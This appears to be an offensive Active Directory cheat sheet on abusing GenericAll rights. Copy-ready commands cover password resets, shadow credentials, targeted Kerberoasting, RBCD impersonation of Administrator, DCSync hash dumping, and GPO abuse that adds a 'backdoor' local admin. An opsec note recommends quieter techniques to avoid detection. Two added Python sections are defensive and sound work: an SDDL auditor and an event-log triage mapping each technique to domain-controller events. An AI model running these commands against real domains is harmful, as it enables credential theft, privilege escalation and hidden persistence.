GenericAll
Source has full control over the target object → equivalent to ownership
Applies to: User → User, User → Group, User → Computer, Group → any, Computer → any
Linux Abuse
Target: User → password reset
bloodyAD
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> set password <target-user> '<new-password>'
Impacket
net rpc password <target-user> '<new-password>' -U <domain>/<username>%'<password>' -S <dc-ip>
Target: User → shadow credentials (no password reset needed)
certipy-ad shadow auto -u <username>@<domain> -p '<password>' -account <target-user> -dc-ip <dc-ip>
Target: User → targeted Kerberoast (set an SPN, then roast)
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> set object <target-user> servicePrincipalName -v '<spn>'
GetUserSPNs.py <domain>/<username>:'<password>' -dc-ip <dc-ip> -request-user <target-user> -outputfile hashes.txt
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
Target: Group → add member
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> add groupMember '<target-group>' '<username>'
Target: Computer → shadow credentials → RBCD or S4U2Self
certipy-ad shadow auto -u <username>@<domain> -p '<password>' -account <target-computer$> -dc-ip <dc-ip>
# certipy outputs NT hash; use with getST.py or pass-the-hash
Target: Computer → RBCD (Resource-Based Constrained Delegation)
# 1. Get/create a computer account we control
addcomputer.py -computer-name 'ATTACKPC$' -computer-pass '<new-password>' -dc-ip <dc-ip> '<domain>/<username>:<password>'
# 2. Write msDS-AllowedToActOnBehalfOfOtherIdentity on target
rbcd.py -f ATTACKPC -t <target-computer> -dc-ip <dc-ip> '<domain>/<username>:<password>'
# 3. Get service ticket impersonating admin
getST.py -spn cifs/<target-computer>.<domain> -impersonate Administrator -dc-ip <dc-ip> '<domain>/ATTACKPC$:<new-password>'
export KRB5CCNAME=Administrator@cifs_<target-computer>.<domain>@<domain>.ccache
# 4. Use ticket
secretsdump.py -k -no-pass <target-computer>.<domain>
Target: GPO → modify GPO via pyGPOAbuse
# GenericAll over a GPO object
python3 pygpoabuse.py <domain>/<username>:'<password>' -gpo-id '<gpo-guid>' -dc-ip <dc-ip> \
-powershell -command "net user backdoor P@ssw0rd123 /add && net localgroup administrators backdoor /add" \
-taskname 'Backdoor' -description 'update'
Target: Domain → DCSync
dacledit.py -action write -rights DCSync -principal <username> -target-dn 'DC=<domain>,DC=<tld>' \
'<domain>/<username>:<password>' -dc-ip <dc-ip>
secretsdump.py '<domain>/<username>:<password>' -dc-ip <dc-ip>
Windows Abuse
Target: User → password reset
$cred = Get-Credential # or build manually
$pass = ConvertTo-SecureString '<new-password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <target-user> -AccountPassword $pass -Credential $cred
Target: User → shadow credentials
# Whisker
Whisker.exe add /target:<target-user> /domain:<domain> /dc:<dc-ip>
# Whisker prints a Rubeus command → run it to get a TGT and the NT hash
Target: Group → add member
Add-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred
# or
net group "<target-group>" <username> /add /domain
Target: Computer → RBCD
# Requires PowerMad + PowerView
$AttackerSID = Get-DomainComputer 'ATTACKPC$' -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$AttackerSID)"
$SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer <target-computer> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
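Added example for the defender side of this step (not code from the original cheat sheet): a Python helper that decodes the SDDL string written into msDS-AllowedToActOnBehalfOfOtherIdentity above and reports which trustee SIDs end up with full-control (GenericAll-equivalent) rights. An audit job can run this over each computer's descriptor and flag any trustee that is not an expected delegation partner. The SIDs below are constructed sample values; the rights-code table is the standard Windows SDDL mapping.

```python
import re

# SDDL two-letter rights codes -> access-mask bits (Windows SDDL definition)
SDDL_RIGHTS = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "RC": 0x00020000, "SD": 0x00010000, "WD": 0x00040000, "WO": 0x00080000,
    "CC": 0x00000001, "DC": 0x00000002, "LC": 0x00000004, "SW": 0x00000008,
    "RP": 0x00000010, "WP": 0x00000020, "DT": 0x00000040, "LO": 0x00000080,
    "CR": 0x00000100,
}
GENERIC_ALL = 0x10000000          # GA: generic full control
AD_FULL_CONTROL = 0x000F01FF      # STANDARD_RIGHTS_ALL | all nine AD object rights

ACE_RE = re.compile(r"\(([^)]*)\)")
DACL_RE = re.compile(r"D:([A-Z]*)((?:\([^)]*\))*)")

# Constructed sample: the descriptor shape used in the PowerShell step above,
# with a made-up domain SID, plus a second ACE that only grants RP/WP.
SAMPLE_SDDL = (
    "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1111111111-2222222222-3333333333-1105)"
    "(A;;RPWP;;;S-1-5-21-1111111111-2222222222-3333333333-1106)"
)


def rights_to_mask(rights: str) -> int:
    """Convert an SDDL rights field ('CCDCLC...' or '0x1f01ff') to an access mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    if len(rights) % 2:
        raise ValueError(f"odd-length rights string: {rights!r}")
    mask = 0
    for i in range(0, len(rights), 2):
        code = rights[i:i + 2]
        if code not in SDDL_RIGHTS:
            raise ValueError(f"unknown SDDL rights code {code!r}")
        mask |= SDDL_RIGHTS[code]
    return mask


def is_full_control(mask: int) -> bool:
    """True when the mask is GenericAll or the fully expanded AD full-control set."""
    return bool(mask & GENERIC_ALL) or (mask & AD_FULL_CONTROL) == AD_FULL_CONTROL


def parse_dacl(sddl: str) -> list:
    """Return one dict per ACE in the DACL: type, trustee SID, mask, full-control flag."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    aces = []
    for body in ACE_RE.findall(m.group(2)):
        fields = body.split(";")
        if len(fields) < 6:
            raise ValueError(f"malformed ACE: {body!r}")
        ace_type, _flags, rights, _obj_guid, _inh_guid, sid = fields[:6]
        mask = rights_to_mask(rights)
        aces.append({
            "type": ace_type,
            "sid": sid,
            "mask": mask,
            # Only an allow ACE grants anything; a deny ACE with the same mask does not.
            "grants_full_control": ace_type == "A" and is_full_control(mask),
        })
    return aces


def full_control_trustees(sddl: str) -> list:
    """SIDs that this descriptor lets act on behalf of other identities with full rights."""
    return [a["sid"] for a in parse_dacl(sddl) if a["grants_full_control"]]


if __name__ == "__main__":
    for ace in parse_dacl(SAMPLE_SDDL):
        print(f"{ace['type']} {ace['sid']} mask=0x{ace['mask']:08X} full={ace['grants_full_control']}")
    print("full-control trustees:", full_control_trustees(SAMPLE_SDDL))
```

The first ACE decodes to mask 0xF01FF, which is exactly the AD full-control set, so the helper reports that trustee as full control; the RP/WP-only ACE is not. In a real audit the SDDL comes from converting the binary attribute value back with the same RawSecurityDescriptor class the PowerShell step uses.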
Target: GPO
# SharpGPOAbuse
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <username> --GPOName "<gpo-name>"
SharpGPOAbuse.exe --AddComputerScript --ScriptName evil.ps1 --ScriptContents "..." --GPOName "<gpo-name>"
Rubeus (shadow creds → NT hash)
Rubeus.exe asktgt /user:<target-user> /certificate:<base64-pfx> /password:<pfx-pass> /nowrap /getcredentials
Opsec
- Password resets generate events 4723/4724 (logged on the DC) → noisy
- RBCD and shadow credentials are quieter; prefer them when the target is a user or computer
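Added example, not part of the original sheet: a small Python triage over constructed Windows Security events that maps each technique above to the event it leaves on a DC, so the "noisy" versus "quiet" distinction can be checked against what a collector actually sees. The 5136 entries for msDS-KeyCredentialLink, msDS-AllowedToActOnBehalfOfOtherIdentity and servicePrincipalName only appear when object-access auditing (a SACL on those attributes) is configured, which is why those paths are quiet by default; 4724 and the group-membership events are logged without any extra setup. Event field names follow the Windows Security log schema; the usernames, DNs and SIDs are constructed.

```python
from typing import Optional

# 5136 (directory object modified): attribute -> technique from this sheet
WATCHED_ATTRIBUTES = {
    "msds-keycredentiallink": "shadow credentials",
    "msds-allowedtoactonbehalfofotheridentity": "RBCD",
    "serviceprincipalname": "targeted Kerberoast (SPN set)",
    "ntsecuritydescriptor": "DACL change (possible DCSync grant)",
}
# Member added to a security-enabled group, by group scope
GROUP_ADD_EVENTS = {4728: "global", 4732: "local", 4756: "universal"}
# Control-access GUIDs for DS-Replication-Get-Changes / -All, seen in 4662 Properties
DS_REPL_GUIDS = ("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                 "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")

# Constructed sample log: five abuse-related events and two benign ones
SAMPLE_EVENTS = [
    {"EventID": 4724, "SubjectUserName": "jdoe", "TargetUserName": "svc_backup"},
    {"EventID": 5136, "SubjectUserName": "jdoe", "ObjectDN": "CN=svc_backup,OU=Service,DC=corp,DC=example",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    {"EventID": 4624, "SubjectUserName": "jdoe", "LogonType": "3"},
    {"EventID": 4728, "SubjectUserName": "jdoe", "TargetUserName": "HelpDesk",
     "MemberName": "CN=jdoe,OU=Users,DC=corp,DC=example"},
    {"EventID": 5136, "SubjectUserName": "jdoe", "ObjectDN": "CN=FILESRV01,OU=Servers,DC=corp,DC=example",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity", "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "admin1", "ObjectDN": "CN=svc_backup,OU=Service,DC=corp,DC=example",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectName": "DC=corp,DC=example",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def classify(ev: dict) -> Optional[dict]:
    """Map one Security event to a GenericAll abuse technique, or None if benign."""
    eid = ev.get("EventID")
    subject = ev.get("SubjectUserName", "?")
    if eid == 4724:
        return {"technique": "password reset", "subject": subject, "target": ev.get("TargetUserName")}
    if eid in GROUP_ADD_EVENTS:
        return {"technique": f"group membership added ({GROUP_ADD_EVENTS[eid]} group)",
                "subject": subject, "target": ev.get("TargetUserName"), "member": ev.get("MemberName")}
    if eid == 5136:
        attr = ev.get("AttributeLDAPDisplayName", "").lower()
        if attr not in WATCHED_ATTRIBUTES:
            return None
        op = "added" if ev.get("OperationType") == "%%14674" else "modified"
        return {"technique": WATCHED_ATTRIBUTES[attr], "subject": subject,
                "target": ev.get("ObjectDN"), "operation": op}
    if eid == 4662:
        props = ev.get("Properties", "").lower()
        if any(g in props for g in DS_REPL_GUIDS):
            return {"technique": "DCSync (replication rights exercised)",
                    "subject": subject, "target": ev.get("ObjectName")}
    return None


def triage(events: list) -> list:
    """Return the hits in log order; benign events are dropped."""
    return [hit for hit in (classify(e) for e in events) if hit]


def hits_by_subject(events: list) -> dict:
    """Group technique names per acting account, useful for spotting one principal chaining several."""
    out = {}
    for hit in triage(events):
        out.setdefault(hit["subject"], []).append(hit["technique"])
    return out


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
    print(hits_by_subject(SAMPLE_EVENTS))
```

Grouping by subject is the useful view: a single account performing a password reset, a KeyCredentialLink write, a group add and an RBCD write in one window is the pattern this sheet describes, whichever individual step was chosen for quietness.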